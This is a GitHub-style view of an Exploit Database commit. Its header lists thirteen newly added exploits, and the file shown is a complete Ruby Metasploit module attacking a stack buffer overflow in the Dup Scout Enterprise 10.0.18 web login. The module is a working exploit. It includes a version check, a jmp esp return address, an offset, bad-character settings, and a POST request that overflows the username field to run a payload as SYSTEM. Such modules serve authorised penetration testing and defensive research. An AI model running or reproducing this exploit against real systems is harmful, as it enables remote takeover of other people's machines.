ed1c4edf3e
13 changes to exploits/shellcodes Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH) Microsoft Office - DDE Payload Delivery (Metasploit) Dup Scout Enterprise - Login Buffer Overflow (Metasploit) pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit) Palo Alto Networks Firewalls - Remote root Code Execution Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection Readymade Video Sharing Script 3.2 - HTML Injection Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection FS Lynda Clone 1.0 - SQL Injection Bus Booking Script 1.0 - 'txtname' SQL Injection Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)
101 lines
No EOL
2.5 KiB
Ruby
Executable file
101 lines
No EOL
2.5 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in Dup Scout Enterprise
|
|
10.0.18. The buffer overflow exists via the web interface during
|
|
login. This gives NT AUTHORITY\SYSTEM access.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Chris Higgins', # msf Module -- @ch1gg1ns
|
|
'sickness' # Original discovery
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'EDB', '43145' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'thread'
|
|
},
|
|
'Platform' => 'win',
|
|
'Payload' =>
|
|
{
|
|
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Dup Scout Enterprise 10.0.18',
|
|
{
|
|
'Ret' => 0x10090c83, # jmp esp - libspp.dll
|
|
'Offset' => 780
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => true,
|
|
'DisclosureDate' => 'Nov 14 2017',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options([Opt::RPORT(80)])
|
|
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi({
|
|
'uri' => '/',
|
|
'method' => 'GET'
|
|
})
|
|
|
|
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
connect
|
|
|
|
print_status("Generating exploit...")
|
|
|
|
evil = rand_text(target['Offset'])
|
|
evil << [target.ret].pack('V')
|
|
evil << make_nops(12)
|
|
evil << payload.encoded
|
|
evil << make_nops(10000 - evil.length)
|
|
|
|
vprint_status("Evil length: " + evil.length.to_s)
|
|
|
|
sploit = "username="
|
|
sploit << evil
|
|
sploit << "&password="
|
|
sploit << rand_text(evil.length)
|
|
sploit << "\r\n"
|
|
|
|
print_status("Triggering the exploit now...")
|
|
|
|
res = send_request_cgi({
|
|
'uri' => '/login',
|
|
'method' => 'POST',
|
|
'content-type' => 'application/x-www-form-urlencoded',
|
|
'content-length' => '17000',
|
|
'data' => sploit
|
|
})
|
|
|
|
handler
|
|
disconnect
|
|
|
|
end
|
|
end |